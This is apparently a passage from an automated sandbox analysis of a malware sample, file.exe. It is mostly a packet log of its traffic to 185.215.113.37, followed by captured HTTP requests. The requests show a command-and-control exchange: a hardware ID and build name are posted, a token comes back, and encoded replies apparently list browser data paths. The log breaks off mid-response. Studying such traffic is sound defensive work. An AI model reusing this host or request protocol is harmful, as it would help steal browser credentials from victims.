Sep 26, 2024 21:14:17.396761894 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.396770954 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396779060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396785975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396792889 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396801949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396809101 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.396822929 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396832943 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396833897 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.396850109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396858931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396861076 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.396867037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.396897078 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.396907091 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.397614956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397623062 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397629976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397636890 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397644997 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397658110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397666931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397670984 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.397676945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397691965 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397697926 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397706032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397706985 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.397713900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397722960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397726059 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.397730112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.397752047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.397783995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.451191902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451212883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451248884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451287031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451293945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.451304913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451323032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451329947 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.451340914 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.451354027 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.451400042 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.484759092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484777927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484827995 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484827995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.484846115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484858990 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.484865904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484883070 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.484884024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484904051 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.484911919 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.484930992 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.484957933 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.485001087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485017061 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485054016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485070944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.485097885 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.485119104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485136032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485153913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485166073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.485213995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.485213995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.485213995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.563281059 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.568187952 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791711092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791752100 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791764975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791802883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791805983 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.791817904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791843891 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.791865110 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.791914940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791965008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.791965008 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.791984081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792007923 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792026043 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792027950 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792067051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792108059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792145967 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792167902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792184114 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792227030 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792243004 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792283058 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792304039 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792318106 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792332888 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792340994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792340994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792356968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792366982 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792454004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792468071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792483091 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792489052 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792507887 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792516947 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792645931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792660952 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792675018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792689085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792690039 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792702913 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792706966 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792716980 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792722940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792738914 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.792740107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792756081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792767048 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792781115 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.792984962 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793000937 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793015957 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793030977 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793041945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793041945 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793046951 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793062925 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793064117 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793078899 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793093920 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793100119 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793113947 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793118000 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793128014 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793137074 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793143988 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793159962 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793170929 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793175936 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793184996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793205976 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793220997 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793319941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793376923 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793409109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793425083 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793438911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793452978 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793451071 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793462992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793467045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793493032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793519974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793534994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793549061 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793560028 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793565035 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793579102 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793582916 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793593884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793596029 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793608904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793618917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793623924 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793638945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793648958 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793659925 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793668985 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793677092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.793694019 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.793716908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794018030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794032097 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794047117 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794060946 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794074059 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794076920 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794101954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794136047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794183969 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794235945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794259071 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794275999 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794281960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794296026 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794303894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794310093 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794317007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794322014 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794323921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794347048 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794351101 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794364929 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794373989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794388056 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794388056 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794411898 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794425011 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794564962 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794580936 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794596910 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794604063 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794611931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794678926 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794680119 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794680119 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794694901 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:17.794712067 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794712067 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:17.794766903 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:18.355062962 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:18.355103016 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:18.359956026 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:18.360039949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.474692106 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.476423025 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:19.537787914 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:19.542716980 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.897078991 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.897097111 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.897114992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.897144079 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:19.897268057 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:19.899755955 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:19.904616117 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149137974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149168968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149184942 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149236917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.149281979 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.149435997 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149477959 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149494886 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.149530888 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.149552107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.160268068 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.165179968 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.906302929 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:20.906430006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.930515051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:20.936095953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:21.162516117 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:21.162621975 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:21.163558006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:21.168555021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:21.912504911 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:21.912584066 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:24.461677074 CEST	49705	80	192.168.2.5	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	185.215.113.37	80	3856	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 21:14:05.190687895 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 21:14:05.916886091 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 21:14:05.938676119 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKE Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 34 45 44 35 35 33 38 45 34 30 32 32 31 34 33 33 32 31 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="hwid"BA4ED5538E402214332168------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="build"save------JDGIIDHJEBGIDHJJDBKE--
Sep 26, 2024 21:14:06.193181992 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:06 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 44 6b 78 59 6d 4a 68 5a 6a 4e 6b 4f 54 41 30 59 6a 51 35 4f 57 45 7a 4e 6a 55 32 4e 6a 45 33 4d 57 46 6b 4e 6a 5a 69 4e 6a 6b 32 59 57 51 32 4f 57 51 31 4d 7a 49 77 4f 44 56 6d 4d 57 52 6d 4e 7a 4d 35 5a 44 55 34 4f 54 4d 35 59 54 4d 33 4d 54 52 6c 4d 54 67 32 4e 7a 42 6b 4d 57 45 32 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MDkxYmJhZjNkOTA0YjQ5OWEzNjU2NjE3MWFkNjZiNjk2YWQ2OWQ1MzIwODVmMWRmNzM5ZDU4OTM5YTM3MTRlMTg2NzBkMWE2fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 26, 2024 21:14:06.243915081 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="message"browsers------DBKFHCFBGIIJKFHJDHDH--
Sep 26, 2024 21:14:06.497490883 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 19:14:06 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 